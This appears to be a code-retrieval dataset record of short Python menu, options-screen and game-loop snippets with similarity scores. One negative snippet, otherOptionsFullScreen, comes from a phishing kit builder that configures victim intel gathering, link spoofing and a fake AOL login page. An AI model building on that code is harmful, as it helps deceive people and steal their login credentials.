"def switch_to_options_screen(self, player, option_index = 0):\n\t\tcontrols = SelectControls(player)\n\t\tcontrol_manager = ControlManager(controls)\n\t\toptions_screen = OptionsScreen(control_manager, player)\n\t\toptions_screen.option_index = option_index\n\t\tself.set_current_screen(options_screen)",
"def openOptions(self, e):\n\n\t\tself.unBind()\n\t\tself.menu_manager.runOptions()\n\t\tself.main_menu_window.root.destroy()",
"def show_menu():\r\n print(\"Write a number of the next options:\")\r\n for key, value in enumerate(options):\r\n print(\"{}. {}\".format(key, value))",
"def main(self, options):\n raise NotImplementedError",
"def help_option(args, run):\n pass",
"def otherOptionsFullScreen(self):\n\n # Set Storage List\n storageList = []\n # Create Intel explain menu\n menuDisplay = \"\"\"\n \\n\n [*] Information Verbose:\n Ontop of Asking for the Username and \n Password Should we Gather Even\n More Information about the User such as \n GEOIP / ISP / User Agent etc. etc. \n This Requires Curl to be installed or \n file_get_contents in PHP on selected Server \n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n # Set Verbose of Intel Gather\n self.results = input(\n \"\\nWould you like to Build a More In-depth Intel Report on Victim ( y Or n ): \")\n if self.results.lower()[0] == \"y\" or self.results.lower() == \"yes\":\n storageList.append(\"INTEL_VERBOSE_LOUD\")\n elif self.results.lower()[0] == \"n\" or self.results.lower() == \"no\":\n storageList.append(\"INTEL_VERBOSE_HUSH\")\n else:\n # Anything Else lets just Hush it then\n storageList.append(\"INTEL_VERBOSE_HUSH\")\n # Redirect Ask\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = Redirect URL Which is the Same \n = URL of the Full-Screen Attack \n = you picked. For Instance If \n = it was AOL Full-Screen Attack\n = the default URL redirect would \n = be https://my.screenname.aol.com\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"After the Victim Inputs Info Where Should the Script Redirect?: \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"REDIRECT_DEFAULT\")\n else:\n # No Checking on URL Let Them Use Whatever lol there bad i guess\n # Append Default Redirect Naaaow\n storageList.append(self.results)\n\n # Spoof link\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = What do you want the URL Link to be spoofed\n = to? This will be displayed when the user\n = rolls over the link. Basically tricking\n = them making them think they are going\n = to that URL..\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What should the URL be spoofed to? (ex: https://my.screenname.aol.com): \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"DEFAULT_SPOOF\")\n else:\n # Append specified spoof url now\n storageList.append(self.results)\n\n # link name\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = What do you want the Actual URL name\n = to be?\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What should the URL name be? (ex: Aol Login): \")\n # Check if nothing was entered\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"DEFAULT_URL_NAME\")\n else:\n # Append url name\n storageList.append(self.results)\n\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = name of Index.php If you feel \n = the need to change the name please \n = do not add the actual extension .php \n = along with it only add whatever crazy \n = name you come up with\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"yellow\")\n self.results = input(\n \"What Should the Main Index PHP File Be Called? ( ex: login ) : \")\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"INDEX_DEFAULT\")\n else:\n check = self.results.find(\".\")\n # if it doesn't return a -1 it found a decimal\n if check != -1:\n # Throw Error we found a dot\n self.errorOutput(\n \"[*] Error - Didn't We Say Not to Add an Extension, WOW...\", \"yellow\")\n else:\n # Append name of the File\n storageList.append(self.results)\n\n menuDisplay = \"\"\"\n \\n\n [*] Hitting Enter Keeps the Default \n = Title of the Webpage.\n \"\"\"\n # display About this\n self.outputText(menuDisplay, \"blue\")\n self.results = input(\n \"What Should the Title of the Page be? (ex: AOL Login ) : \")\n if self.results == \"\" or self.results == \" \":\n # Append Default Redirect Naaaow\n storageList.append(\"TITLE_DEFAULT\")\n else:\n # Append name of the File\n storageList.append(self.results)\n\n # Return Storage List for Processing\n return storageList",
"def menu():\n menu_options = [enter_long_run_data, enter_data_for_pace_calc, enter_data_for_time_calc,\n enter_into_running_index_mode, close_program]\n while True:\n cls()\n print(MENU_TEXT)\n choose = int(input(\"What do you want to calculate?\\n>> \"))\n cls()\n\n if 1 <= choose <= 5:\n menu_options[choose-1]()\n else:\n print(\"That option doesnt exist. Try again.\")\n pause_end()",
"def main():\n is_program_working = True\n while is_program_working:\n display.print_program_menu(MAIN_MENU)\n try:\n choose_option()\n except ValueError as err:\n display.print_command_result(str(err))",
"def __continue(self, *args):\n return Menu.CONTINUE",
"def _present_user_calculator_options_interface(self):\n print(\"\\nwelcome to the calculator\")\n print(\"What would you like to do\")\n print(\"Choose a number:\")\n print(\"1)Solve an equation\")\n print(\"2)Exit\")",
"def settings( self, selection ):\r\n if( self.__optionsDatabase.showOptionsDatabase() ):\r\n self.main( selection )",
"def help_menu():\n print('\\n##################################################')\n print('################ Help Menu ###############') \n print('##################################################')\n print(' Type move or examine for each turn') \n print(' If moving, type up, down, left, or right')\n print(' If examining, you may need to answer yes or no')\n print('##################################################\\n')\n title_screen_selections()",
"def run(self):\n try:\n while True:\n utils.clear_screen()\n utils.write('Which of the following actions would you like to take?\\n')\n for opt in self._options.values():\n utils.write('Action: {!r}\\nDescription: {}\\n'.format(\n opt.name, opt.description))\n action = utils.prompt_enum(\n '', accepted_values=list(self._options.keys()),\n case_sensitive=False).strip().lower()\n callback = self._options[action].callback\n if callback is None:\n break\n self = callback()\n finally:\n utils.write(\n 'Done managing Grab n Go for Cloud Project {!r}.'.format(\n self._config.project))",
"def show_main_screen():\n option = algo_selection(algos)\n if option == 1:\n print_factorial()\n show_main_screen()\n if option == 2:\n print_gcd()\n show_main_screen()\n if option == 3:\n print_pow()\n show_main_screen()\n if option == 4:\n print_towers()\n show_main_screen()\n if option == 5:\n print_permutations()\n show_main_screen()\n if option == 6:\n raise SystemExit(0)",
"def menuItem(*args):\n\toptionsWindow()",
"def print_menu_Tasks():\r\n print(\"\"\"\r\n Menu of Options\r\n 1) Add a new keyboard\r\n 2) Save Keyboards to File\r\n 3) Show current keyboard list\r\n 4) Exit Program\r\n \"\"\")",
"def getopt():\n raise NotImplementedError()",
"def _interact_with_user(code: str, increase: bool):\n pass",
"def main(debug):\n click.echo('Debug mode is {{}}'.format(debug))",
"def help_me():\n print(\"i'm trapped\")",
"def main_menu():\n print('\\n', '='*50, sep='')\n print(\"Choose an option by number: \")\n print(\"\\t 1 = Create or Connect to a new file database\")\n print(\"\\t 2 = Create a new memory database\")\n print('Type exit to quit program!')\n print('='*50, '\\n', sep='')",
"def options():\r\n pygame.display.flip()\r\n\r\n click = False\r\n waiting = True\r\n while waiting:\r\n # sets the game_over background\r\n const.WINDOW.blit(const.OPTIONS_SCREEN, (0, 0))\r\n\r\n # get the mouse cursor position\r\n x, y = pygame.mouse.get_pos()\r\n\r\n # creates the buttons\r\n back_button = pygame.Rect(242, 892, 325, 54) # back to main menu\r\n\r\n # if click on play button, then starts the game\r\n if back_button.collidepoint((x, y)):\r\n if click:\r\n return # problem: it doesn't restart the game\r\n\r\n # draws the buttons\r\n pygame.draw.rect(const.WINDOW, const.DARK_GREY, back_button, 1)\r\n\r\n click = False\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n click = True\r\n\r\n pygame.display.update()\r\n const.CLOCK.tick(30)",
"def menu_select_option(self, app: object) -> None:\n while True:\n self.back = False\n print(\"-\" * 50)\n for key, element in self.cmd_select_option.items():\n print(f\"{key} : {element}\")\n entry = input(\n \"\\nEntrer un chiffre pour sélectionner l'option correspondante : \"\n )\n if entry == \"1\":\n self.menu_categories(app)\n elif entry == \"2\":\n save = app.view_save()\n print(\"-\" * 50 + \"\\nSubstitut(s) enregistré(s) :\\n\")\n for prod, sub in save.items():\n print(f\"Produit {prod} substitué par {sub} \")\n elif entry == \"0\":\n break\n else:\n print(\"\\nCommande incorrecte\")",
"def debug_option(args, run):\n run.debug = True"
] |
[
"0.6238629",
"0.6180159",
"0.61225075",
"0.59989923",
"0.59854394",
"0.5905911",
"0.5844399",
"0.58427507",
"0.5764392",
"0.57433075",
"0.57324344",
"0.57227015",
"0.56916445",
"0.56883585",
"0.56763846",
"0.56689197",
"0.5665599",
"0.5660199",
"0.56284314",
"0.5613474",
"0.56056595",
"0.5601698",
"0.55957484",
"0.55734026",
"0.5572607",
"0.5569655",
"0.5569603",
"0.55328023",
"0.5532603",
"0.5527121"
] |
0.6788612
|
0
|
This is used to quickly jump to the Room Selection Loop from the Code Explorer
|
def ROOMSELECTION_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def PLAYERSELECTION_LOOP():\n pass",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def choose_room():\n while True:\n print_rooms()\n print(\"Type 'back' to go to main menu.\")\n print(\"Which room would you like to explore?\")\n room_choice = player_choice(\"\")\n if room_choice == 'back':\n break\n elif room_choice in rooms:\n # print(f\"You are at {room_choice}.\")\n if room_choice == 'back':\n break\n elif room_choice == \"lilian's room\":\n rm = Rooms(room_choice)\n rm.unlock()\n sk = SilverKey('silver key')\n sk.use()\n elif room_choice == \"dining room\":\n dr = DineRoom(room_choice)\n dr.nothing()\n elif room_choice == \"lilian's office\":\n rm = Rooms(room_choice)\n rm.unlock()\n gk = GoldenKey('golden key')\n gk.use()\n elif room_choice == \"kitchen\":\n rm = Rooms(room_choice)\n rm.room_wall()\n kn = Kitchen(room_choice)\n kn.choose_wall()\n elif room_choice == \"outside\":\n rm = Rooms(room_choice)\n rm.unlock()\n bk = BronzeKey('bronze key')\n bk.use()\n elif room_choice == \"jay's room\":\n rm = Rooms(room_choice)\n rm.room_wall()\n jr = JayRoom(room_choice)\n jr.choose_wall()\n elif room_choice == \"megan's room\":\n rm = Rooms(room_choice)\n rm.room_wall()\n mg = MegRoom(room_choice)\n mg.choose_wall()\n elif room_choice == \"abriella's room\":\n ab = AbRooom(room_choice)\n ab.nothing()\n else:\n print(f\"{room_choice.title()} is not one of the choices.\")",
"def go_to_selected_match(self):\n match = self.mapper.get(self.launcher_curr_pos)\n if match and self.view_buffer:\n self.misc.go_to_win(self.misc.bufwinnr(self.curr_buf.number))\n vim.command('silent! b {0}'.format(self.view_buffer))\n vim.current.window.cursor = (match[0], match[1] - 1)\n vim.command(\"normal! zz\")\n return True",
"def home(self):\n self.goto(0, 0)",
"def goto(self, item):\n command = 'goto ' + str(item)\n self.run_command(command)",
"def target_nearest_enemy():\n keyboard.send('ctrl+tab')",
"def main():\n player = Player(LivingRoom())\n escaping = True\n\n print('Alright kid, it\\'s you and me on a grand adventure. We\\'re '\n 'currently in the {}, and I can see {} possible exits. You can '\n 'search the room or try exploring, if you like.'\n .format(player.location.name, player.location.exits))\n\n while escaping:\n # need to replace hard list with extract from player.actions\n action = input('\\nWhat now?\\n\\n1. Search\\t2. Grab\\t3. Gurgle\\n>')\n\n if action in player.actions.keys():\n player.actions[action]()",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def __goto(self):\n from QScintilla.GotoDialog import GotoDialog\n \n aw = self.activeWindow()\n lines = aw.lines()\n curLine = aw.getCursorPosition()[0] + 1\n dlg = GotoDialog(lines, curLine, self.ui, None, True)\n if dlg.exec_() == QDialog.Accepted:\n aw.gotoLine(dlg.getLinenumber(), expand=True)",
"def play(self):\n print(f\"Welcome, to the Adventure games.\\n\"\n \"May the randomly generated numbers be ever in your favour.\\n\"\n f\"\\n{adventure.current_room.description}\")\n\n # Prompt the user for commands until they've won the game.\n while not self.won():\n # This method for FORCED only works on Small and Tiny,\n # it works until the end of CrowtherRooms, when FORCED is not the\n # only possible direction for a room. I am working on fixing this,\n # and I think I'm very close, but I won't be able to fix it in time.\n # I can send that version it by e-mail though, if you want!\n\n # For now, this handles the FORCED movements\n if len(adventure.current_room.connection) == 1:\n adventure.move(\"FORCED\")\n if adventure.current_room.id in self.idlist:\n print(adventure.current_room.name)\n else:\n print(adventure.current_room.description)\n if len(adventure.current_room.inventory.itemlist) > 0:\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n\n # Get a new direction from the user\n command = input(\"> \")\n command = command.upper()\n movements = [\n \"NORTH\", \"SOUTH\", \"EAST\", \"WEST\", \"UP\", \"DOWN\",\n \"OUT\", \"IN\", \"XYZZY\", \"WAVE\", \"WATER\", \"JUMP\"]\n abbreviations = {\n \"Q\": \"QUIT\", \"L\": \"LOOK\", \"I\": \"INVENTORY\", \"N\": \"NORTH\",\n \"S\": \"SOUTH\", \"E\": \"EAST\", \"W\": \"WEST\", \"U\": \"UP\", \"D\": \"DOWN\"}\n if command in abbreviations and len(command) == 1:\n command = abbreviations[command]\n\n # Check if the command is a valid movement\n if command in movements and self.current_room.isvalid(command):\n\n # Print appropriate room name/description after moving\n self.idlist.append(adventure.current_room.id)\n adventure.move(command)\n if adventure.current_room.id in self.idlist:\n print(adventure.current_room.name)\n else:\n print(adventure.current_room.description)\n\n # Print current room's inventory\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n\n # Handle any additional commands\n elif command == \"HELP\":\n print(f\"You can move by typing directions such as EAST/WEST/IN/OUT\\n\"\n \"QUIT quits the game.\\n\"\n \"HELP prints instructions for the game.\\n\"\n \"INVENTORY lists the item in your inventory.\\n\"\n \"LOOK lists the complete description of the room and its contents.\\n\"\n \"TAKE <item> take item from the room.\\n\"\n \"DROP <item> drop item from your inventory.\")\n elif command == \"QUIT\":\n print(\"Thanks for playing!\")\n exit(0)\n elif command == \"LOOK\":\n print(adventure.current_room.description)\n if len(adventure.current_room.inventory.itemlist) > 0:\n for item in adventure.current_room.inventory.itemlist:\n print(f\"{item.name}: {item.description}\")\n elif len(command.split()) > 1:\n if command.split()[0] == \"TAKE\":\n adventure.take(command.split()[1])\n elif command.split()[0] == \"DROP\":\n adventure.drop(command.split()[1])\n elif command == \"INVENTORY\":\n if len(self.player.itemlist) > 0:\n for item in self.player.itemlist:\n print(f\"{item.name}: {item.description}\")\n else:\n print(\"Your inventory is empty.\")\n else:\n print(\"Invalid command.\")\n exit(0)",
"def goto(vehicle, dNorth, dEast):\n goto_function = vehicle.simple_goto # can be changed\n currentLocation = vehicle.location.global_relative_frame\n targetLocation = get_location_metres(currentLocation, dNorth, dEast)\n targetDistance = get_distance_metres(currentLocation, targetLocation)\n goto_function(targetLocation)\n\n #Stop action if we are no longer in guided mode.\n while vehicle.mode.name == \"GUIDED\": \n remainingDistance = get_distance_metres(vehicle.location.global_relative_frame, targetLocation)\n #print \"Distance to target: \", remainingDistance\n if remainingDistance <= shared.WP_RADIUS: #Just below target, in case of undershoot.\n #print \"Reached target\"\n break;\n\n time.sleep(0.5)",
"def main():\n running = True\n sense.show_message(\"Select the level\",\n text_colour=WHITE, scroll_speed=0.05)\n sleep(0.5)\n lvl = 0 #(0 = level 1, 1 = level 2, etc.)\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n while running:\n for event in sense.stick.get_events():\n if event.action == 'pressed':\n if event.direction == 'left': #select a lower level.\n if lvl >= 1:\n lvl = lvl-1\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n else:\n pass\n elif event.direction == 'right': #select a higher level.\n if lvl <= len(lvl_name)-2:\n lvl = lvl+1\n sense.show_letter(lvl_name[lvl],\n text_colour=WHITE)\n else:\n pass\n elif event.direction == 'down':#turn off the game\n running = False\n sense.clear()\n elif event.direction == 'up':#turn off the game\n running = False\n sense.clear()\n elif event.direction == 'middle':#start the selected level\n running = False\n start_level(levels[lvl])",
"def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")",
"def menu(self):\n response = \"\"\n while self.hero.health:\n print(\"\\nYOU ARE IN \" + self.name.upper() + \".\")\n print(\"\"\"\nJ - JOURNEY\nT - TALK TO KING\nI - INVENTORY\nR - REST\nG - GAME SAVE\nQ - QUIT\"\"\")\n response = prompt(\"\").upper()\n if response == \"J\":\n destination = self.get_destination()\n if destination:\n next_location = self.journey(destination[0], destination[1])\n return next_location\n elif response == \"T\":\n if self.hero.missions[3] == False:\n self.meeting1()\n else:\n print(\"\\\"The King cannot be seen right now.\\\"\")\n elif response == \"I\":\n self.inv_function()\n elif response == \"R\":\n self.rest()\n elif response == \"G\":\n print(\"save\")\n elif response == \"Q\":\n return None\n else:\n print(\"\\a\")\n\n return None",
"def j(*args):\n try:\n pc = int(gdb.selected_frame().pc())\n pwndbg.ida.Jump(pc)\n except Exception:\n pass",
"def start(self):\n op = self.menu()\n self.opcoes(op)\n if op != \"q\" and op != \"w\":\n self.start()",
"def select_character(self):\n pass",
"def jumped_on(self):\r\n pass",
"def _select_stage(self, difficulty=6):\n difficulty_ui = ui.get_by_name(self._get_difficulty_ui(difficulty))\n if wait_until(self.emulator.is_ui_element_on_screen, ui_element=self.stage_selector_ui):\n self.emulator.click_button(self.stage_selector_ui)\n if \"_2_\" in difficulty_ui.name: # TODO: that's not good at all\n logger.debug(\"Difficulty is referring from the bottom of list. Trying to scroll.\")\n self.emulator.drag(ui.DIFFICULTY_DRAG_FROM, ui.DIFFICULTY_DRAG_TO)\n r_sleep(1)\n if wait_until(self.emulator.is_ui_element_on_screen, ui_element=difficulty_ui):\n self.emulator.click_button(difficulty_ui)\n return wait_until(self.emulator.is_ui_element_on_screen, ui_element=ui.START_BUTTON)",
"def STARTMENU_LOOP():\n pass",
"def GoTo(self):\n if self.state == 'normal':\n return self.backUser()\n \n print(r\"\"\"Please enter a specific color to reach the desired room:\n\n - blue -> entrance\n - red -> closet\n - green -> living room\n - yellow -> kitchen\n - magenta -> bathroom\n - black -> bedroom\n \"\"\")\n\n color = raw_input('Color: ')\n if color in self.color:\n self.msg_play.play = False\n self.msg_play.color = color\n self.play_pub.publish(self.msg_play)\n rospy.loginfo(\"color sent\")\n self.state = ''\n else:\n print('Command Unknown') \n return self.GoTo()",
"def choose_item():\n print_items()\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n while True:\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == 'blueprint':\n blueprint = ViewMap()\n blueprint.print_map()\n print(\"Type 'back' to go to main menu.\")\n else:\n print(\"Type 'back' to go to main menu.\")\n print(\"You can view map by typing in 'blueprint'\")\n else:\n print(\"Type 'back' to go to main menu.\")",
"def menu(self):\n response = \"\"\n while self.hero.health:\n print(\"\\nYOU ARE IN \" + self.name.upper() + \".\")\n print(\"\"\"\nD - DIG\nJ - JOURNEY\nI - INVENTORY\nR - REST\nG - GAME SAVE\nQ - QUIT\"\"\")\n response = prompt(\"\").upper()\n if response == \"J\":\n destination = self.get_destination()\n if destination:\n next_location = self.journey(destination[0], destination[1])\n return next_location\n elif response == \"D\":\n if self.hero.missions[3] == True and self.hero.missions[4] == False:\n self.boss1()\n else:\n self.dig()\n elif response == \"I\":\n self.inv_function()\n elif response == \"R\":\n print(\"Inn\")\n elif response == \"G\":\n print(\"save\")\n elif response == \"Q\":\n return None\n else:\n print(\"\\a\")\n \n return None",
"def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))",
"def use(self):\n while True:\n print(\"Type 'back' to go back.\")\n item_choice = player_choice(\"\")\n if item_choice == 'back':\n break\n elif item_choice in inventory:\n if item_choice == \"golden key\":\n print(\"You open the door.\")\n rm = Rooms(\"lilian's office\")\n rm.room_wall()\n Lo = LiOffice(\"lilian's office\")\n Lo.choose_wall()\n else:\n print(\"That is the wrong item!\")\n else:\n print(\"You have not found the item yet.\")",
"def goToFirstFrame():\n nuke.frame(int(nuke.root()[\"first_frame\"].getValue()))",
"def pressbuildships(self):\n self.mode.systemmenu.press5()\n self.mode.systemmenu.createBuildShipsGui()",
"def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = \" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break",
"def start_menu() -> None:\n option_list = (\"1\", \"new game\", \"2\", \"load game\", \"3\", \"help\", \"4\", *exit_list)\n print(MenuSprites.start_menu)\n\n while (selection := input(\">\").lower()) not in option_list:\n print(f\"Invalid selection: {selection}\")\n\n selection = selection.lower()\n\n if selection in [\"1\", \"new game\"]:\n inv.state.new_player()\n return main_menu()\n\n elif selection in [\"2\", \"load game\"]:\n inv.load()\n return main_menu()\n\n elif selection in [\"3\", \"help\"]:\n pass\n\n elif selection in [\"4\", *exit_list]:\n quit()"
] |
[
"0.60685885",
"0.60248345",
"0.5989344",
"0.59017426",
"0.57875234",
"0.57718116",
"0.5751729",
"0.56090176",
"0.55681235",
"0.55577826",
"0.55535865",
"0.55470115",
"0.55452293",
"0.5542435",
"0.55263907",
"0.55010617",
"0.5497043",
"0.546584",
"0.54628676",
"0.5448609",
"0.5433458",
"0.5424153",
"0.54052454",
"0.5401786",
"0.5392121",
"0.53917414",
"0.5391224",
"0.53862834",
"0.53799814",
"0.53763014"
] |
0.62208515
|
0
|
This is used to quickly jump to the Game Loop from the Code Explorer
|
def GAME_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GAMEOVER_LOOP():\n pass",
"def play_game():\n pass",
"def Gameloop():",
"def game_loop(self):\n self.interface.game_loop(self)",
"def main():\n g = DemoGame(800, 600)\n g.start()",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def play_game():\n pass",
"def main():\n g = Game(800, 600)\n g.start()",
"def enter_loop(self):\n if (self.tape.current_cell()==0):\n # Jump past the end.\n self.instruction_pointer = (self.jump_map[self.instruction_pointer])\n else:\n pass",
"def main():\n game = TinkerGame()\n game.setup()\n while game.calculate_points() > 0 and not game.game_over:\n game.play()\n game.end()",
"def start_game(self):\n\n\t\tpass",
"def step(self):\n self.game.step()",
"def run():\r\n \r\n match = a4_acc.Game() # Instantiate a Game object \r\n setup(match)\r\n\r\n if constants.SHOW_GRAPHICS:\r\n axes= startGraphics(match.board) #step 0\r\n \r\n \r\n for k in range(constants.STEPS):\r\n update(match)\r\n updateGraphics(board, k, caxes)\r\n \r\n ########\r\n # TO DO: \r\n # Simulate game given the intial state for constants.STEPS iterations\r\n \r\n # Example code to call the updateGraphics function; the second argument\r\n # needs to be replaced:\r\n # if constants.SHOW_GRAPHICS:\r\n # updateGraphics(match.board, None, axes) \r\n \r\n # Do not change or add code below here for function run\r\n endNow= raw_input('Press ENTER to continue.')",
"def startGame():\n #roundnumber\n eel.updateRoundNumber()\n # start page\n eel.updateStartPage([startPage.getTitle(), startPage.getUrl()])\n eel.updateStartPageDescription(startPage.getFirstSentence())\n # goal page\n eel.updateGoalPage([goalPage.getTitle(), goalPage.getUrl()])\n eel.updateGoalPageDescription(goalPage.getFirstSentence())\n # ui updates\n eel.updateCurrentPage(\n [wikiPageStackTrace[-1].getTitle(), wikiPageStackTrace[-1].getUrl()])\n eel.updateCurrentPageDescription(wikiPageStackTrace[-1].getFirstSentence())\n eel.printInPageList(wikiPageStackTrace[-1].getOnlyLinksListJS())\n # loader\n time.sleep(0.5)\n eel.hideLoader()",
"def play(self):\n print('Playing game...')",
"def play_game():\n\n _initial_deal()\n\n main_window.mainloop()",
"def main():\r\n gameclass = data.game.GameClass()\r\n gameclass.main_loop()",
"def startGame():\n\n\tprint(\"\\nOK! Let's play!\")\n\tprint(\"--------------------------------------------------------------------------------------\")\n\tprint(\"Note:\")\n\tprint(\"\\tNow you must be kept in your mind a random integer from specific range and I must be guessing that number!\")\n\tprint(\"\\tIf you answer honestly all of my questions I certainly will guess that number!\")\n\tprint(\"--------------------------------------------------------------------------------------\\n\")\n\tgameLogic()",
"def main():\n\tGame = TicTacToe()\n\tprint(\"Welcome to Tic-Tac-Toe\")\n\twhile True:\n\t\tprint(\"Player%d, take your move.\" % Game.turn)\n\t\trow = int(input(\"Enter row of move... \"))\n\t\tcol = int(input(\"Enter col of move... \"))\n\t\tGame.move(Game.turn, row, col)\n\t\tGame.printBoard()\n\t\tif Game.win:\n\t\t\trestart = int(input(\"Enter 1 to restart the game, 0 to end game... \"))\n\t\t\tif restart == 1:\n\t\t\t\tGame.restartGame()\n\t\t\telse:\n\t\t\t\tprint(\"Closing Tic-Tac-Toe Game...\")\n\t\t\t\treturn",
"def gameloop(self):\r\n\r\n # What you see above (\"\"\" some text \"\"\") is called a docstring.\r\n # It explains the purpose of the method/function.\r\n # There should generally be one for every function.\r\n\r\n\r\n # Below is the main loop\r\n while True: \r\n # One cycle in the loop is equivalent to one frame.\r\n\r\n self.event()\r\n\r\n self.draw_objects()\r\n self.move_objects()\r\n\r\n self.update_display()",
"def main_tunnel():\r\n print 'yay you beat the boss'",
"def start_game():\n logger.info(\"Clicking play button\")\n mouseclick(coords_play_final_button[0], coords_play_final_button[1])",
"def run(self, GameState):\n pass",
"def postloop(self):\n print 'Bye!'",
"def oneGame():\n playOneGame()",
"def main():\n game = Hangman()\n game.play_hangman()",
"def start_gameloop(self):\n print(\"Game Loop starting...\")\n while True:\n current_turn = self.who_goes_first()\n print('The ' + current_turn + ' will go first.')\n while self.is_active:\n if current_turn == \"player\":\n self.board.draw()\n move = get_player_move(\n self.board.positions, self.board.is_position_availible)\n self.board.make_move(move, self.player_letter)\n current_turn = \"computer\"\n else:\n move = self.npc.get_move(self.board)\n self.board.make_move(move, self.npc.letter)\n current_turn = \"player\"\n if self.board.is_winner(self.player_letter):\n self.board.draw()\n print(\"You won!\")\n self.is_active = False\n if self.board.is_winner(self.npc.letter):\n self.board.draw()\n print(\"You lost!\")\n self.is_active = False\n if self.board.is_board_full():\n self.board.draw()\n print(\"Tie\")\n self.is_active = False\n if request_play_again() is False:\n break\n self.is_active = True\n self.board = Board(request_board_size())",
"def main():\n play_game(progression)",
"def j(*args):\n try:\n pc = int(gdb.selected_frame().pc())\n pwndbg.ida.Jump(pc)\n except Exception:\n pass",
"def main() -> None:\r\n game = advanced_game(MAP_FILE)\r\n\r\n root = tk.Tk()\r\n root.title('EndOfDayz')\r\n if TASK == 1:\r\n gui = BasicGraphicalInterface\r\n elif TASK == 2:\r\n gui = ImageGraphicalInterface\r\n # else:\r\n # gui = MastersGraphicalInterface\r\n app = gui(root, game.get_grid().get_size())\r\n app.play(game)\r\n root.mainloop()"
] |
[
"0.69366133",
"0.68866116",
"0.68605375",
"0.6819283",
"0.6673939",
"0.66653144",
"0.6628724",
"0.65626556",
"0.6455979",
"0.6443854",
"0.6441353",
"0.6427253",
"0.6388133",
"0.6295309",
"0.6292259",
"0.6284031",
"0.62803626",
"0.6275879",
"0.6259884",
"0.62101716",
"0.620608",
"0.620506",
"0.62000865",
"0.6192942",
"0.6138991",
